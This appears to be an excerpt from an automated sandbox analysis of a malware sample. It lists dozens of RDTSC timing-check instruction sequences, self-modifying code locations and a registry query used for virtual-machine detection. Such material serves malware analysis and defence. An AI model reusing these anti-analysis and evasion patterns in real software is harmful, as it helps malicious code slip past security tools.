Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63899C second address: 6389A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63D6D4 second address: 63D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F789CC614A4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63EC49 second address: 63EC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63EC4F second address: 63EC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F789CC61486h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63EC5E second address: 63EC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63EC62 second address: 63EC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644446 second address: 64444A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644598 second address: 6445B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61493h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6445B3 second address: 6445CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F789C73D5B0h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644CAB second address: 644CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61490h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F789CC61499h 0x00000012 jne 00007F789CC61486h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644CE2 second address: 644CEC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644CEC second address: 644D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F789CC6148Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 644D00 second address: 644D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64515D second address: 645179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC61498h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 645179 second address: 64517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 645A29 second address: 645A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 646185 second address: 64618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64618B second address: 64618F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64CEEE second address: 64CF0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F789C73D5B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64CF0E second address: 64CF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64CF16 second address: 64CF2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64CF2D second address: 64CF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61494h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64CF4C second address: 64CF52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64D1FD second address: 64D208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789CC61486h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6580B7 second address: 6580BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6580BC second address: 6580DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F789CC6148Fh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F789CC6148Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CE46 second address: 65CE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CE4A second address: 65CE50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C9CD second address: 65C9E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F789C73D5AFh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C9E4 second address: 65C9F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F789CC61486h 0x0000000a jnc 00007F789CC61486h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C9F4 second address: 65C9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C9F8 second address: 65CA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65FB83 second address: 65FB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B2h 0x00000007 jl 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65FB9F second address: 65FBAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F789CC61486h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65FBAA second address: 65FBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F789C73D5ACh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnp 00007F789C73D5ACh 0x00000018 jmp 00007F789C73D5AAh 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65FBDB second address: 65FBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789CC61486h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66B135 second address: 66B171 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F789C73D5AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F789C73D5AFh 0x00000010 pushad 0x00000011 jbe 00007F789C73D5A6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F789C73D5A6h 0x00000024 jbe 00007F789C73D5A6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66B171 second address: 66B17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66B17D second address: 66B187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F789C73D5A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66B187 second address: 66B198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66F4C6 second address: 66F4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6744BF second address: 6744DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61499h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6747C3 second address: 6747C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674941 second address: 674945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674945 second address: 674977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F789C73D5E5h 0x0000000d push esi 0x0000000e jmp 00007F789C73D5B9h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jbe 00007F789C73D5A6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674B1A second address: 674B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F789CC61486h 0x00000009 jmp 00007F789CC61493h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679A00 second address: 679A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679A17 second address: 679A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B226 second address: 67B22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682EA8 second address: 682EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682EAE second address: 682EE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c je 00007F789C73D5A6h 0x00000012 jmp 00007F789C73D5B3h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e jno 00007F789C73D5A6h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686928 second address: 68692E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6956AC second address: 6956B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6956B0 second address: 6956B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69551C second address: 695556 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F789C73D5A6h 0x00000008 jne 00007F789C73D5A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jns 00007F789C73D5A8h 0x00000016 jmp 00007F789C73D5B3h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F789C73D5A8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695556 second address: 69555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69555A second address: 69556D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 696CC5 second address: 696CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2EC second address: 69C2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2F0 second address: 69C2FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C2FF second address: 69C303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C303 second address: 69C328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F789CC6148Dh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC55 second address: 6AAC5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC5B second address: 6AAC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAC5F second address: 6AAC6E instructions: 0x00000000 rdtsc 0x00000002 je 00007F789C73D5A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AAD86 second address: 6AADA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61498h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADA7 second address: 6AADBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789C73D5A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADBB second address: 6AADC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADC6 second address: 6AADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADCC second address: 6AADD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F789CC61488h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AADD9 second address: 6AADEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F789C73D5AAh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3DE second address: 6AB3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3E4 second address: 6AB3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3EA second address: 6AB3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB3EE second address: 6AB415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 jns 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F789C73D5A6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB547 second address: 6AB54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB682 second address: 6AB68E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jbe 00007F789C73D5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB96F second address: 6AB973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB973 second address: 6AB98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB98C second address: 6AB9B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F789CC61499h 0x00000009 jmp 00007F789CC6148Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE622 second address: 6AE639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AEBA1 second address: 6AEBAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AEBAE second address: 6AEBFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007F789C73D5A6h 0x0000000d pop edx 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007F789C73D5B7h 0x00000015 push dword ptr [ebp+1246A6B2h] 0x0000001b jmp 00007F789C73D5B5h 0x00000020 push 59F6AD05h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFD3A second address: 6AFD3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B184D second address: 6B1853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1853 second address: 6B1858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1858 second address: 6B1892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F789C73D5B2h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F789C73D5AAh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007F789C73D5AAh 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1427 second address: 6B143A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 js 00007F789CC61494h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B326D second address: 6B3277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3277 second address: 6B327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B327D second address: 6B328A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F789C73D5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF028B second address: 4CF02DD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F789CC61496h 0x00000008 jmp 00007F789CC61495h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F789CC6148Eh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F789CC6148Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02DD second address: 4CF02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02E3 second address: 4CF02FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC6148Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF02FD second address: 4CF0301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0301 second address: 4CF0307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 421BD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 421C8E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5CC0E8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5DFF49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 64F954 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
